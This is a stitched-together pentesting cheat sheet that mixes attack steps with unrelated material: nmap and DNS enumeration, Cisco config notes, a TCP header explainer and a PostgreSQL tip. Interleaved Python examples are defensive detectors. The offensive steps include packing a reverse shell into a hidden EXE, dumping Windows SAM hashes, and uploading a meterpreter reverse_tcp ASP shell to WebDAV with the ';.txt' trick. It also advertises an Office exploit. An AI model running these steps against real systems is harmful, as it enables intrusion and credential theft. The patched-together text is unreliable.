PyInstaller (Linux/Windows)
#FastTips
python.exe c:\Python27\PyInstaller-2.1\pyinstaller.py --noconsole --onefile c:\Python27\PyInstaller-2.1\ReverseShell.py
+ Generate the .spec file.
+ Windows (you want a single EXE file with your data in it, hence --onefile):
python pyinstaller.py --onefile yourmainfile.py
+ Rebuild your package.
python pyinstaller.py yourmainfile.spec
+ Look for your .exe or your .app bundle in the dist directory.
#FastTips
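The defender's counterpart to the packaging tip above, as an added example that is not part of the original post: a PyInstaller one-file bundle ends in a fixed "MEI" cookie, so triage tooling can recognise a packed executable and read the bundled Python version without running the sample. The cookie layout is PyInstaller's own 2.1+ format; the sample blob is constructed (not a real PE file), and the version decoding rule in decode_pyvers is an assumption stated in the comment.

```python
import struct

# PyInstaller's archive cookie magic: "MEI" followed by 0c 0b 0a 0b 0e.
PYI_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# PyInstaller 2.1+ cookie: magic, archive length, TOC offset, TOC length,
# Python version, name of the bundled Python shared library (64 bytes).
PYI_COOKIE_FMT = "!8sIIii64s"
PYI_COOKIE_SIZE = struct.calcsize(PYI_COOKIE_FMT)  # 88 bytes


def decode_pyvers(pyvers: int) -> str:
    """Turn the cookie's version int into 'major.minor'.

    Assumption: old bundles encode major*10+minor (27, 36) and newer ones
    major*100+minor (310, 311); anything >= 100 is treated as the latter.
    """
    major, minor = divmod(pyvers, 100) if pyvers >= 100 else divmod(pyvers, 10)
    return f"{major}.{minor}"


def find_pyinstaller_cookie(data: bytes):
    """Return the parsed cookie if `data` looks like a PyInstaller bundle, else None."""
    pos = data.rfind(PYI_MAGIC)  # the cookie sits at the end of the embedded archive
    if pos == -1 or len(data) - pos < PYI_COOKIE_SIZE:
        return None  # no magic, or a truncated cookie
    magic, archive_len, toc_pos, toc_len, pyvers, pylib = struct.unpack(
        PYI_COOKIE_FMT, data[pos:pos + PYI_COOKIE_SIZE])
    return {
        "cookie_offset": pos,
        "archive_len": archive_len,
        "toc_pos": toc_pos,
        "toc_len": toc_len,
        "python_version": decode_pyvers(pyvers),
        "pylib_name": pylib.rstrip(b"\x00").decode("ascii", "replace"),
    }


def make_sample_bundle() -> bytes:
    """Constructed stand-in for a packed executable: header bytes, padding, cookie."""
    cookie = struct.pack(PYI_COOKIE_FMT, PYI_MAGIC, 4096, 3000, 512, 27,
                         b"python27.dll".ljust(64, b"\x00"))
    return b"MZ" + b"\x00" * 300 + cookie


def scan_file(path: str):
    """Read a file from disk and report whether it carries a PyInstaller cookie."""
    with open(path, "rb") as fh:
        return find_pyinstaller_cookie(fh.read())


if __name__ == "__main__":
    print(find_pyinstaller_cookie(make_sample_bundle()))
```

Run scan_file() over a quarantine directory to separate PyInstaller bundles from other executables before deeper analysis; the toc_pos and toc_len fields are what an unpacker uses next to enumerate the embedded scripts.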
Pentesting tips:
Metasploit - spool /home/<username>/.msf3/logs/console.log
Save contents from each terminal!
Linux - script myoutput.txt # Type exit to stop
+ Disable network-manager
service network-manager stop
+ Set IP address
ifconfig eth0 192.168.50.12/24
+ Set default gateway
route add default gw 192.168.50.9
+ Set DNS servers
echo "nameserver 192.168.100.2" >> /etc/resolv.conf
+ Show routing table
Windows - route print
Linux - route -n
+ Add static route
Linux - route add -net 192.168.100.0/24 gw 192.16.50.9
Windows - route add 0.0.0.0 mask 0.0.0.0 192.168.50.9
+ Subnetting easy mode
ipcalc 192.168.0.1 255.255.255.0
+ Windows SAM file locations
c:\windows\system32\config\
c:\windows\repair\
bkhive system /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt
+ Python Shell
python -c 'import pty;pty.spawn("/bin/bash")'
topic git sources
Internet Host/Network Enumeration
[+] WHOIS Querying
whois www.domain.com
[+] Resolve an IP using DIG
dig @8.8.8.8 securitymuppets.com
[+] Find Mail servers for a domain
dig @8.8.8.8 securitymuppets.com -t mx
[+] Find any DNS records for a domain
dig @8.8.8.8 securitymuppets.com -t any
[+] Zone Transfer
dig @192.168.100.2 securitymuppets.com -t axfr
host -l securitymuppets.com 192.168.100.2
nslookup (interactive): ls -d domain.com.local
[+] Fierce
fierce -dns <domain> -file <output_file>
fierce -dns <domain> -dnsserver <server>
fierce -range <ip-range> -dnsserver <server>
fierce -dns <domain> -wordlist <wordlist>
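The zone transfer checks above have a server-side mirror: a DNS operator should know which hosts actually pull the zone. The following added example (not part of the original post) runs a small detection over constructed log lines modelled on BIND 9's named output for AXFR; the wording of those messages varies between BIND versions, so the regex is an assumption to adjust against your own server's log, and ALLOWED_SECONDARIES is a constructed allow-list.

```python
import re
from collections import Counter

# Constructed sample lines, modelled on BIND 9 "named" messages for zone
# transfers (check your server's real wording before relying on the regex).
SAMPLE_LOG = """\
12-Mar-2024 10:01:02.123 xfer-out: info: client @0x7f3c 192.0.2.10#41234 (securitymuppets.com): transfer of 'securitymuppets.com/IN': AXFR started
12-Mar-2024 10:01:02.456 xfer-out: info: client @0x7f3c 192.0.2.10#41234 (securitymuppets.com): transfer of 'securitymuppets.com/IN': AXFR ended
12-Mar-2024 10:05:11.001 security: error: client @0x7f3d 198.51.100.7#53012 (securitymuppets.com): zone transfer 'securitymuppets.com/IN' denied
12-Mar-2024 10:05:12.002 security: error: client @0x7f3d 198.51.100.7#53013 (securitymuppets.com): zone transfer 'securitymuppets.com/IN' denied
12-Mar-2024 10:09:00.000 xfer-out: info: client @0x7f3e 203.0.113.5#60000 (securitymuppets.com): transfer of 'securitymuppets.com/IN': AXFR started
"""

# Constructed: the only hosts that are supposed to pull this zone (your secondaries).
ALLOWED_SECONDARIES = {"192.0.2.10"}

XFR_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<ip>\d+\.\d+\.\d+\.\d+)#\d+ \((?P<zone>[^)]+)\): "
    r"(?:transfer of '[^']+': (?P<result>AXFR started|AXFR ended)"
    r"|zone transfer '[^']+' (?P<denied>denied))"
)


def analyze_zone_transfers(log_text: str, allowed=ALLOWED_SECONDARIES):
    """Return findings: a transfer served to a host outside the allow-list is
    'high' (the zone has leaked); repeated denied attempts are 'low' but still
    worth a look because they show someone probing the server."""
    findings = []
    denied = Counter()
    for line in log_text.splitlines():
        m = XFR_RE.search(line)
        if not m:
            continue
        ip, zone = m.group("ip"), m.group("zone")
        if m.group("result") == "AXFR started" and ip not in allowed:
            findings.append({"severity": "high", "ip": ip, "zone": zone,
                             "reason": "zone transfer served to a host that is not an allowed secondary"})
        elif m.group("denied"):
            denied[ip] += 1
    for ip, n in denied.items():
        findings.append({"severity": "low", "ip": ip, "zone": None,
                         "reason": f"{n} denied AXFR attempt(s)"})
    return findings


if __name__ == "__main__":
    for f in analyze_zone_transfers(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['ip']}: {f['reason']}")
```

A 'high' finding means the allow-transfer ACL on the server does not match the list of secondaries you believe in; fix the ACL first, then treat the leaked zone contents as public.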
IP Network scanning
[+] ARP Scan
arp-scan 192.168.50.8/28 -I eth0
[+] NMAP Scans
[+] Nmap ping scan
sudo nmap -sn -oA nmap_pingscan 192.168.100.0/24 (optionally add -PE for ICMP echo discovery)
[+] Nmap SYN/Top 100 ports Scan
nmap -sS -F -oA nmap_fastscan 192.168.0.1/24
[+] Nmap SYN/Version All port Scan - ## Main Scan
sudo nmap -sV -PN -p0- -T4 -A --stats-every 60s --reason -oA nmap_scan 192.168.0.1/24
[+] Nmap SYN/Version No Ping All port Scan
sudo nmap -sV -Pn -p0- --exclude 192.168.0.1 --reason -oA nmap_scan 192.168.0.1/24
[+] Nmap UDP All port scan - ## Main Scan
sudo nmap -sU -p0- --reason --stats-every 60s --max-rtt-timeout=50ms --max-retries=1 -oA nmap_scan 192.168.0.1/24
[+] Nmap UDP/Fast Scan
nmap -F -sU -oA nmap_UDPscan 192.168.0.1/24
[+] Nmap Top 1000 port UDP Scan
nmap -sU -oA nmap_UDPscan 192.168.0.1/24
[+] HPING3 Scans
hping3 -c 3 -s 53 -p 80 -S 192.168.0.1
Open = flags = SA
Closed = Flags = RA
Blocked = ICMP unreachable
Dropped = No response
[+] Source port scanning
nmap -g <port> (e.g. 88 (Kerberos), 53 (DNS) or 67 (DHCP))
A fixed source port also does not work for OS detection.
[+] Speed settings
-n Disable DNS resolution
-sS TCP SYN (Stealth) Scan
-Pn Disable host discovery
-T5 Insane time template
--min-rate 1000 1000 packets per second
--max-retries 0 Disable retransmission of timed-out probes
[+] Netcat (swiss army knife)
# Connect mode (ncat is client) | default port is 31337
ncat <host> [<port>]
# Listen mode (ncat is server) | default port is 31337
ncat -l [<host>] [<port>]
# Transfer file (closes after one transfer)
ncat -l [<host>] [<port>] < file
# Transfer file (stays open for multiple transfers)
ncat -l --keep-open [<host>] [<port>] < file
# Receive file
ncat [<host>] [<port>] > file
# Brokering | allows for multiple clients to connect
ncat -l --broker [<host>] [<port>]
# Listen with SSL | many options, use ncat --help for full list
ncat -l --ssl [<host>] [<port>]
# Access control
ncat -l --allow <ip>
ncat -l --deny <ip>
# Proxying
ncat --proxy <proxyhost>[:<proxyport>] --proxy-type {http | socks4} <host>[<port>]
# Chat server | can use brokering for multi-user chat
ncat -l --chat [<host>] [<port>]
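The -oA runs above also write a .gnmap (grepable) file, which is the easiest format to diff between scheduled scans of your own ranges. The following added example (not from the original post) parses constructed .gnmap output for two scans of the same network and reports ports that were not open in the baseline and hosts that did not exist before; the sample output and addresses are constructed, and the field layout follows nmap's documented "port/state/proto/owner/service/rpc/version/" entries.

```python
import re

# Constructed .gnmap (nmap -oG / -oA) output for two scans of the same range.
SCAN_BASELINE = """\
# Nmap 7.94 scan initiated Tue Mar 12 09:00:00 2024 as: nmap -sS -F -oA nmap_fastscan 192.168.0.1/24
Host: 192.168.0.5 ()\tStatus: Up
Host: 192.168.0.5 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///\tIgnored State: closed (98)
Host: 192.168.0.9 ()\tStatus: Up
Host: 192.168.0.9 ()\tPorts: 443/open/tcp//https///\tIgnored State: filtered (99)
# Nmap done at Tue Mar 12 09:00:40 2024 -- 256 IP addresses (2 hosts up) scanned in 40.12 seconds
"""

SCAN_TODAY = """\
# Nmap 7.94 scan initiated Wed Mar 13 09:00:00 2024 as: nmap -sS -F -oA nmap_fastscan 192.168.0.1/24
Host: 192.168.0.5 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 3389/open/tcp//ms-wbt-server///\tIgnored State: closed (97)
Host: 192.168.0.9 ()\tPorts: 443/open/tcp//https///, 8080/filtered/tcp//http-proxy///\tIgnored State: filtered (98)
Host: 192.168.0.77 ()\tPorts: 21/open/tcp//ftp///\tIgnored State: closed (99)
# Nmap done at Wed Mar 13 09:00:41 2024 -- 256 IP addresses (3 hosts up) scanned in 41.03 seconds
"""

# Only lines that carry a "Ports:" section describe open ports.
HOST_RE = re.compile(r"^Host: (?P<ip>\S+) \([^)]*\)\tPorts: (?P<ports>.*?)(?:\tIgnored State:.*)?$")


def parse_gnmap(text: str):
    """Map each host to its open ports: {ip: {(port, proto, service), ...}}."""
    inventory = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue
        open_ports = set()
        for entry in m.group("ports").split(", "):
            # Each entry is port/state/proto/owner/service/rpc/version/
            fields = entry.split("/")
            port, state, proto, service = int(fields[0]), fields[1], fields[2], fields[4]
            if state == "open":
                open_ports.add((port, proto, service))
        inventory.setdefault(m.group("ip"), set()).update(open_ports)
    return inventory


def diff_exposure(baseline, current):
    """Return newly open (host, port, proto, service) tuples and brand-new hosts,
    so a reviewer can chase each change back to a ticket (or to an incident)."""
    new_ports = []
    for ip, ports in current.items():
        for port, proto, service in sorted(ports - baseline.get(ip, set())):
            new_ports.append((ip, port, proto, service))
    new_hosts = sorted(set(current) - set(baseline))
    return new_ports, new_hosts


if __name__ == "__main__":
    ports, hosts = diff_exposure(parse_gnmap(SCAN_BASELINE), parse_gnmap(SCAN_TODAY))
    for ip, port, proto, service in ports:
        print(f"NEW PORT  {ip}:{port}/{proto} ({service})")
    for ip in hosts:
        print(f"NEW HOST  {ip}")
```

Filtered ports are deliberately left out of the inventory: they change with firewall state and would make every diff noisy, while a newly open port is the signal worth paging on.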
Attachment: Exploit Office 2016 using CVE-2018-0802 .pdf (332.4 KB) - exploit office 2016 any user !!
Cisco/Networking Commands
? - Help
> - User mode
# - Privileged mode
router(config)# - Global Configuration mode
enable secret is more secure than enable password.
For example, in the configuration command:
enable secret 5 $1$iUjJ$cDZ03KKGh7mHfX2RSbDqP.
The enable secret has been hashed with MD5, whereas in the command:
username jdoe password 7 07362E590E1B1C041B1E124C0A2F2E206832752E1A01134D
The password has been encrypted with the weak, reversible type 7 algorithm.
enable - Change to privileged mode to view configs
config terminal/config t - Change to global config mode to modify
#show version - Gives you the router's configuration register (Firmware)
#show running-config - Shows the router, switch, or firewall's current configuration
#show ip route - show the router's routing table
#show tech-support - Dump config but obscure passwords
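The type 5 / type 7 distinction above is exactly what a configuration review looks for. The following added example (not part of the original post) is a small linter that walks a running-config and flags credential lines by their encryption type: cleartext and type 7 as high, MD5 type 5 as medium (Cisco recommends type 8 or 9 hashes on platforms that support them), and SNMPv1/v2c community strings as medium. It deliberately does not decode type 7 values. The config excerpt is constructed around the two lines quoted in the text; the type 9 hash in it is a placeholder.

```python
# Constructed running-config excerpt; the enable secret and jdoe lines are
# the ones quoted in the text above, the type 9 hash is a placeholder.
SAMPLE_CONFIG = """\
hostname edge-rtr-1
service password-encryption
enable secret 5 $1$iUjJ$cDZ03KKGh7mHfX2RSbDqP.
username jdoe password 7 07362E590E1B1C041B1E124C0A2F2E206832752E1A01134D
username ops secret 9 $9$PLACEHOLDERHASH
line vty 0 4
 password 0 letmein
 login
snmp-server community public RO
"""

# Verdict per encryption type; types 8/9 (and unknown types) raise no finding.
VERDICTS = {
    "0": ("high", "cleartext password"),
    "7": ("high", "type 7 password: reversible obfuscation, recoverable by anyone who can read the config"),
    "5": ("medium", "type 5 (MD5) secret; prefer type 8 or 9 where the platform supports them"),
}


def classify_credential(line: str):
    """Return (severity, reason) for a config line that stores a credential weakly, else None."""
    tokens = line.split()
    if not tokens:
        return None
    if tokens[0] == "enable" and len(tokens) >= 3 and tokens[1] in ("password", "secret"):
        rest = tokens[2:]
    elif tokens[0] == "username" and len(tokens) >= 4 and tokens[2] in ("password", "secret"):
        rest = tokens[3:]
    elif tokens[0] == "password" and len(tokens) >= 2:      # line con / vty passwords
        rest = tokens[1:]
    elif tokens[0] == "snmp-server" and len(tokens) >= 3 and tokens[1] == "community":
        return ("medium", "SNMP community string (v1/v2c, sent in cleartext on the wire)")
    else:
        return None
    # An explicit encryption type precedes the value; no type at all means cleartext (type 0).
    enc_type = rest[0] if len(rest) >= 2 and rest[0].isdigit() else "0"
    return VERDICTS.get(enc_type)


def audit_config(config_text: str):
    """Run classify_credential over every line and collect numbered findings."""
    findings = []
    for lineno, line in enumerate(config_text.splitlines(), 1):
        result = classify_credential(line)
        if result:
            severity, reason = result
            findings.append({"line": lineno, "severity": severity,
                             "reason": reason, "text": line.strip()})
    return findings


if __name__ == "__main__":
    for f in audit_config(SAMPLE_CONFIG):
        print(f"line {f['line']:>3} [{f['severity']}] {f['reason']}: {f['text'][:40]}")
```

Feed it the output of show running-config (not show tech-support, which obscures the very fields being checked) and fix high findings by re-entering the credential with `secret` rather than `password`.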
Remote Information Services
+ DNS
Zone Transfer - host -l securitymuppets.com 192.168.100.2
Metasploit auxiliary modules:
auxiliary/gather/enumdns
use auxiliary/gather/dns...
[+] Finger - Enumerate Users
finger @192.168.0.1
finger -l -p user@ip-address
auxiliary/scanner/finger/fingerusers
+ NTP
Metasploit auxiliary modules
+ SNMP
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt
Metasploit Module snmpenum
snmpcheck -t snmpservice
[+] rservices
rwho 192.168.0.1
rlogin -l root 192.168.0.17
[+] RPC Services
rpcinfo -p
Endpointmapper metasploit
Web Services
+ WebDAV
Metasploit auxiliary modules
Upload shell to Vulnerable WebDAV directory:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=4444 R | msfencode -t asp -o shell.asp
cadaver http://192.168.0.60/
put shell.asp shell.txt
copy shell.txt shell.asp;.txt
Start reverse handler - browse to http://192.168.0.60/shell.asp;.txt
[+] Nikto Web Scanner
# To scan a particular host
perl nikto.pl -host [host IP/name]
# To scan a host on multiple ports (default = 80)
perl nikto.pl -host [host IP/name] -port [port number 1], [port number 2], [port number 3]
# To scan a host and output fingerprinted information to a file
perl nikto.pl -host [host IP/name] -output [outputfile]
# To use a proxy while scanning a host
perl nikto.pl -host host IP/name -useproxy proxy address
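The WebDAV sequence above leaves a clear trace in the web server's own log: write methods from a DAV client followed by a request for a name like shell.asp;.txt. The following added example (not from the original post) is a detector over constructed IIS W3C log lines; it reads the #Fields header so the column order is taken from the log itself, flags successful PUT/COPY/MOVE of anything with a script extension, and flags requests whose file name hides a script extension before a ';'. The log lines, addresses and the list of script extensions are constructed assumptions; extend SCRIPT_EXTS to match what your handler mappings actually execute.

```python
# Constructed IIS W3C log excerpt; cs(User-Agent) values never contain spaces
# in IIS logs (spaces are written as '+'), so whitespace splitting is safe.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2024-03-12 10:00:01 192.168.0.60 GET /index.html - 80 - 192.168.0.20 Mozilla/5.0 200
2024-03-12 10:00:05 192.168.0.60 PUT /shell.txt - 80 - 192.168.0.20 cadaver/0.23.3 201
2024-03-12 10:00:07 192.168.0.60 COPY /shell.txt - 80 - 192.168.0.20 cadaver/0.23.3 201
2024-03-12 10:00:09 192.168.0.60 GET /shell.asp;.txt - 80 - 192.168.0.20 Mozilla/5.0 200
2024-03-12 10:03:00 192.168.0.60 PUT /docs/report.docx - 80 - 192.168.0.31 Microsoft-WebDAV-MiniRedir/10.0 201
2024-03-12 10:04:30 192.168.0.60 PUT /upload/cmd.aspx - 80 - 198.51.100.9 cadaver/0.23.3 201
"""

# Extensions the server-side handlers would execute (assumption; adjust to your mappings).
SCRIPT_EXTS = (".asp", ".aspx", ".ashx", ".asmx", ".cer", ".php", ".jsp")
WRITE_METHODS = {"PUT", "COPY", "MOVE", "MKCOL", "PROPPATCH", "DELETE"}


def executable_path(path: str) -> bool:
    """True if the final name, or any ';'-separated piece of it, ends in a
    script extension (covers the legacy 'shell.asp;.txt' parsing quirk)."""
    name = path.rsplit("/", 1)[-1].lower()
    return any(part.endswith(SCRIPT_EXTS) for part in name.split(";"))


def parse_iis(log_text: str):
    """Yield one dict per request, keyed by the names in the #Fields directive."""
    fields = None
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue
        values = line.split()
        if fields and len(values) == len(fields):
            yield dict(zip(fields, values))


def detect_webdav_abuse(log_text: str):
    """Findings: every successful DAV write (info), escalated to high when the
    target could execute; plus any request for a script hidden behind ';'."""
    findings = []
    for rec in parse_iis(log_text):
        method, path = rec["cs-method"], rec["cs-uri-stem"]
        status, client = rec["sc-status"], rec["c-ip"]
        base = {"client": client, "method": method, "path": path}
        if method in WRITE_METHODS and status.startswith("2"):
            if executable_path(path):
                findings.append({**base, "severity": "high",
                                 "reason": "WebDAV write succeeded on an executable script path"})
            else:
                findings.append({**base, "severity": "info", "reason": "WebDAV write succeeded"})
        elif ";" in path.rsplit("/", 1)[-1] and executable_path(path):
            findings.append({**base, "severity": "high",
                             "reason": "request for a script extension hidden behind ';' in the file name"})
    return findings


if __name__ == "__main__":
    for f in detect_webdav_abuse(SAMPLE_IIS_LOG):
        print(f"[{f['severity']}] {f['client']} {f['method']} {f['path']}: {f['reason']}")
```

Correlate the info-level writes with the high findings by client address: a PUT of a harmless-looking .txt followed minutes later by a request for the same base name with a script extension is the pattern to alert on, and the fix on the server side is to leave write methods disabled on any directory the script handlers can execute from.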
WHY WE SHOULD USE TCP CONNECTIONS?
> What is one TCP connection?
Before examining the structure of the TCP packet header, let's figure out what one TCP connection is - this will help us understand more clearly what exactly we are analyzing in Wireshark and how many TCP connections we need to look for. For example, how many TCP connections are involved in opening one page of a website? A typical website consists of one page of HTML code, several cascading style sheet (CSS) and JavaScript files, and a couple of dozen image files. To receive each of these files, a new TCP connection is created, and for each of these connections a three-way handshake is performed - this is the "overhead" that TCP carries.
> That is, when you open a website page, the browser makes the first TCP connection and receives the source code of the web page. In this code the browser finds links to style, script and image files, and a new TCP connection is started for each of these files.
> Therefore, when analyzing traffic in Wireshark while opening even a single web page, you will see many TCP connections being started and completed.
1) Source port - bits 0-15. This is the packet's source port. The source port was originally tied directly to the process in the sending system. Today a hash of the IP addresses and the destination and source ports is used to achieve this uniqueness, which we can associate with a single application or program.
2) Destination port - bits 16-31. This is the destination port of the TCP packet. As with the source port, it was initially tied directly to the process in the receiving system. Today a hash is used instead, which allows more connections to be open at the same time. When the packet is answered, the destination and source ports are swapped in the reply back to the original sending host, so that the destination port is now the source port and the source port is the destination port.
3) The source port and destination port do not have to be the same: for example, if a request is made to port 80 of the server, the request may come from, say, port 34054.
4) The port numbers on the server may be either standard or arbitrary.
5) Sequence number - bits 32-63. The sequence number field numbers each TCP packet so that the TCP stream can be properly ordered (that is, packets are brought back into the correct order). The sequence number is then returned in the ACK field to confirm that the packet was received correctly.
It counts the bytes transmitted: each byte of payload transferred increases this value by 1.
6) If the SYN flag is set (a session is being established), the field contains the initial sequence number - ISN (Initial Sequence Number). For security purposes this value is generated randomly and can be anywhere between 0 and 2^32 - 1 (4294967295). The first byte of payload in the established session will have number ISN + 1.
7) Otherwise, if SYN is not set, the first byte of data transmitted in this packet has this sequence number.
8) Acknowledgment number (ACK SN) - bits 64-95. This field is used when we acknowledge a specific packet received by the host. For example, we receive a packet with a given sequence number, and if everything is in order with the packet, we respond with an ACK packet with an acknowledgment number equal to the original sequence number.
If the ACK flag is set, this field contains the number of the octet that the sender of this segment wants to receive next. This means that all previous octets (numbered from ISN + 1 to ACK - 1 inclusive) were received successfully.
9) Each side calculates its own Sequence number for the data it transmits and, separately, an Acknowledgment number for the data it receives. Accordingly, the Sequence number of each side corresponds to the Acknowledgment number of the other side.
10) Header length (data offset) - bits 96-99. This field gives the length of the TCP packet header and therefore where the actual data (payload) begins. The field is 4 bits wide and expresses the TCP header length in 32-bit words. The header must always end on a 32-bit boundary, even with various options set (options may be absent altogether, or their number may vary). This is possible thanks to the Padding field at the very end of the TCP header.
11) The minimum header size is 5 words and the maximum is 15 words, which gives a minimum of 20 bytes and a maximum of 60 bytes, leaving up to 40 bytes for options in the header. The field is called "data offset" because it also gives the position of the actual data relative to the beginning of the TCP segment.
12) So the header length determines the offset of the payload relative to the beginning of the segment. For example, a Data offset of 1111 indicates that the header occupies fifteen 32-bit words (15 words * 32 bits per word / 8 bits = 60 bytes).
TCP Session
TCP handshake (establishing a TCP connection)
> TCP uses a three-way handshake to establish a connection.
1) A connection can be made only if the other side is listening on the port to which the connection will be made: for example, a web server listens on ports 80 and 443. This part is not covered by the handshake, but before the client tries to connect to the server, the server must first bind to the port and start listening on it to open it for connections: this is called a passive open. Once a passive open is in place, the client can initiate an active open. To establish the connection, a three-way (or three-step) handshake takes place:
2) First step, sending a packet with the SYN flag set: the active open is performed by the client sending a SYN to the server. The client sets the sequence number of the segment to a random value A.
Note that by default Wireshark shows the relative value of the sequence number (Sequence number); just below it you can also see the real value (shown as raw).
Connection termination
1) The connection teardown phase uses a four-way handshake, with each side of the connection terminating independently. When an endpoint wants to stop its half of the connection, it sends a FIN packet, which the other end confirms with a packet carrying the ACK flag.
2) Therefore a typical teardown requires a pair of FIN and ACK segments from each TCP endpoint. After the side that sent the first FIN has answered with the final ACK, it waits for a timeout before finally closing the connection; during that time the local port is not available for new connections, which prevents confusion caused by delayed packets being delivered to subsequent connections.
3) The connection may be "half-open", in which case one side has finished its part and the other has not. The side that has finished can no longer send any data on the connection, but the other side can. The finished side must keep reading data until the other side also completes its work.
4) It is also possible to close the connection with a three-way handshake: host A sends FIN, host B answers FIN & ACK (combining two steps into one), and host A answers ACK.
5) Some operating systems, such as Linux and HP-UX, implement a half-duplex close sequence in the TCP stack. If the host actively closes the connection while incoming data remains unread, the host sends an RST (all received data is lost) instead of FIN. This guarantees to the TCP application that the remote process has read all the transmitted data, by waiting for the FIN before it actively closes the connection. The remote process cannot distinguish an RST that aborts the connection from data loss; both cause the remote stack to discard all received data.
6) As you can see in the screenshot, the termination of the TCP connection also takes this form (Linux with a recent kernel):
Client: FIN-ACK
Server: FIN-ACK
Client: ACK
Written by Undercode
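The header fields, the three-way handshake and the FIN-ACK / FIN-ACK / ACK close described in the sections above can all be checked with a few lines of struct arithmetic. The following added example (not code from the original post) builds and parses raw TCP headers with the bit layout given in the text (ports, sequence and acknowledgment numbers, the 4-bit data offset in 32-bit words, the flag bits, zero-padded options), then verifies the ISN + 1 relationships of a handshake and of the three-segment close. The session uses fixed ISNs A and B instead of random ones (B is placed at 2^32 - 1 so the wrap-around is exercised); the checksum is left at zero because it needs the IP pseudo-header, which the page does not cover.

```python
import struct

FLAG_BITS = {"FIN": 0x001, "SYN": 0x002, "RST": 0x004, "PSH": 0x008,
             "ACK": 0x010, "URG": 0x020, "ECE": 0x040, "CWR": 0x080, "NS": 0x100}
MASK32 = 0xFFFFFFFF  # sequence space is 0 .. 2^32 - 1


def build_tcp_header(sport, dport, seq, ack, flags, options=b"", window=65535):
    """Assemble a TCP header. Options are zero-padded to a 32-bit boundary (the
    Padding field) so the data offset stays a whole number of words."""
    options += b"\x00" * ((-len(options)) % 4)
    data_offset = 5 + len(options) // 4            # header length in 32-bit words
    flag_value = sum(FLAG_BITS[f] for f in flags)
    # Checksum stays 0: computing it needs the IP pseudo-header (out of scope).
    fixed = struct.pack("!HHIIHHHH", sport, dport, seq & MASK32, ack & MASK32,
                        (data_offset << 12) | flag_value, window, 0, 0)
    return fixed + options


def parse_tcp_header(segment: bytes) -> dict:
    """Decode the fixed 20-byte header and split options from payload via data offset."""
    if len(segment) < 20:
        raise ValueError("segment shorter than the minimum 20-byte TCP header")
    sport, dport, seq, ack, off_flags, window, checksum, urg = struct.unpack("!HHIIHHHH", segment[:20])
    data_offset = off_flags >> 12                   # bits 96-99
    header_len = data_offset * 4                    # 5..15 words -> 20..60 bytes
    if data_offset < 5 or header_len > len(segment):
        raise ValueError(f"invalid data offset {data_offset}")
    flags = [name for name, bit in FLAG_BITS.items() if off_flags & bit]
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack, "flags": flags,
            "window": window, "header_len": header_len,
            "options": segment[20:header_len], "payload": segment[header_len:]}


def check_three_way_handshake(syn, synack, ack) -> bool:
    """SYN consumes one sequence number, so each ACK must equal the peer's ISN + 1."""
    return ("SYN" in syn["flags"] and "ACK" not in syn["flags"]
            and "SYN" in synack["flags"] and "ACK" in synack["flags"]
            and synack["ack"] == (syn["seq"] + 1) & MASK32
            and "ACK" in ack["flags"] and "SYN" not in ack["flags"]
            and ack["seq"] == (syn["seq"] + 1) & MASK32
            and ack["ack"] == (synack["seq"] + 1) & MASK32)


def check_close(fin1, fin2, last_ack) -> bool:
    """The three-segment close from the text (FIN-ACK, FIN-ACK, ACK); a FIN also
    consumes one sequence number, so the acknowledgments are again seq + 1."""
    return ("FIN" in fin1["flags"] and "FIN" in fin2["flags"] and "ACK" in fin2["flags"]
            and fin2["ack"] == (fin1["seq"] + 1) & MASK32
            and "ACK" in last_ack["flags"] and "FIN" not in last_ack["flags"]
            and last_ack["ack"] == (fin2["seq"] + 1) & MASK32)


def demo_session():
    """Constructed session: fixed ISNs A (client) and B (server), no payload."""
    A, B = 0x1A2B3C4D, 0xFFFFFFFF           # B at 2^32 - 1 so B + 1 wraps to 0
    mss = b"\x02\x04\x05\xb4"                # MSS option: kind 2, length 4, value 1460
    syn = parse_tcp_header(build_tcp_header(34054, 80, A, 0, ["SYN"], mss))
    synack = parse_tcp_header(build_tcp_header(80, 34054, B, A + 1, ["SYN", "ACK"], mss))
    ack = parse_tcp_header(build_tcp_header(34054, 80, A + 1, B + 1, ["ACK"]))
    handshake_ok = check_three_way_handshake(syn, synack, ack)
    # Closing right away: both sides still sit at ISN + 1.
    fin1 = parse_tcp_header(build_tcp_header(34054, 80, A + 1, B + 1, ["FIN", "ACK"]))
    fin2 = parse_tcp_header(build_tcp_header(80, 34054, B + 1, A + 2, ["FIN", "ACK"]))
    last = parse_tcp_header(build_tcp_header(34054, 80, A + 2, B + 2, ["ACK"]))
    return handshake_ok, check_close(fin1, fin2, last), syn["header_len"]


if __name__ == "__main__":
    print(demo_session())  # (True, True, 24): MSS option makes the SYN header 6 words
```

The same parse_tcp_header works on the bytes Wireshark exports from a capture (Copy as Hex Stream, starting at the TCP header), which is a quick way to confirm the relative sequence numbers it displays against the raw ones.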
How to Display actual PostgreSQL queries
#REQUESTED
1) Display the actual queries generated by \d and other backslash commands.
2) You can use this to examine psql's internal operations.
This is equivalent to setting the ECHO_HIDDEN variable:
> \set ECHO_HIDDEN
Output:
postgres=# \l
********* QUERY **********
SELECT d.datname as "Name",
pg_catalog.pg_get_userbyid(d.datdba) as "Owner",
pg_catalog.pg_encoding_to_char(d.encoding) as "Encoding",
d.datcollate as "Collate",
d.datctype as "Ctype",
pg_catalog.array_to_string(d.datacl, E'\n') AS "Access privileges"
FROM pg_catalog.pg_database d
ORDER BY 1;
******************
List of databases
Name | Owner | Encoding | Collate | Ctype | Access privileges
-----------+----------+----------+-------------+-------------+-----------------------
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
